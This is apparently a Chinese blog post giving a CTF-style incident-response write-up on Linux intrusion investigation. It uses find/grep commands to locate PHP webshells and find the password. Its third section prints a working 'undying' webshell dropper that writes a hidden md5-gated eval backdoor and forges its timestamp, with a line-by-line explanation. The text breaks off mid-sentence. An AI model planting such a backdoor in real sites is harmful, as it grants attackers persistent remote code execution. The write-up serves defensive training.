第一章应急响应- Linux入侵排查

news/2025/10/19 4:41:06/文章来源:https://www.cnblogs.com/HalfwayMousie/p/19148909

第一章应急响应- Linux入侵排查

1、web目录存在木马，请找到木马的密码提交

这里告诉我们web目录存在木马我们来到/var/www/html下面看到有一个1.php 使用cat命令查看发现是一句话木马，木马密码就为POST传参的值

flag{1}

2、服务器疑似存在不死马，请找到不死马的密码提交

指恶意软件中的一种 persistence（持久化）或自愈机制：即使你杀掉运行的进程、删除文件、甚至重装某些软件后，恶意程序仍能通过其它途径重新出现或继续控制主机。
变体包括“自愈型后门”、“复活木马”、“固件/引导级后门”等。

这里可以使用命令查看木马文件在哪里

find ./ -type f -name "*.php" | xargs grep "eval("

可以看到这里有个md5加密值拿去解密一下获得flag

flag{hello}

find ./ type f -name ".jsp" | xargs grep "exec("
find ./ type f -name ".php" | xargs grep "eval("
find ./ type f -name ".asp" | xargs grep "execute("
find ./ type f -name ".aspx" | xargs grep "eval("

//对于免杀Webshell，可以查看是否使用编码
find ./ type f -name "*.php" | xargs grep "base64_decode"

xargs：xargs命令用于将输入数据重新格式化后作为参数传递给其他命令。在这个命令中，xargs将find命令找到的文件列表作为参数传递给grep命令。

grep "eval("：grep命令用于搜索文本，并输出匹配的行。这里"eval("是grep命令的搜索模式，用于查找包含eval(字符串的行。

3、不死马是通过哪个文件生成的，请提交文件名

这里我们cat index.php文件

$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);
system('touch -m -d "2021-01-01 00:00:01" .shell.php');
usleep(3000);

file_put_contents(...)：在网站根目录写入一个隐藏文件 .shell.php，内容是一个 webshell。

webshell 内容逻辑：如果 $_POST["pass"] 的 MD5 等于 5d41402abc4b2a76b9719d911017c592（这是 md5("hello")），就对 $_POST['cmd'] 的内容做 eval() —— 任意 PHP 代码执行。

system('touch -m -d "2021-01-01 00:00:01" .shell.php');：把这个文件的修改时间改成 2021-01-01，目的是伪装/隐藏（不让人通过最近修改时间快速发现）。

usleep(3000);：短暂睡眠，微小延迟（没实质作用，可能用于避开某些检测时序）。

这是一个后门 webshell，密码是 hello（因为 md5("hello") == 5d41402...）。攻击者/恶意代码在每次 index.php 被访问时都会尝试写入（或覆盖）这个后门并隐藏时间戳。

至此我们确定文件为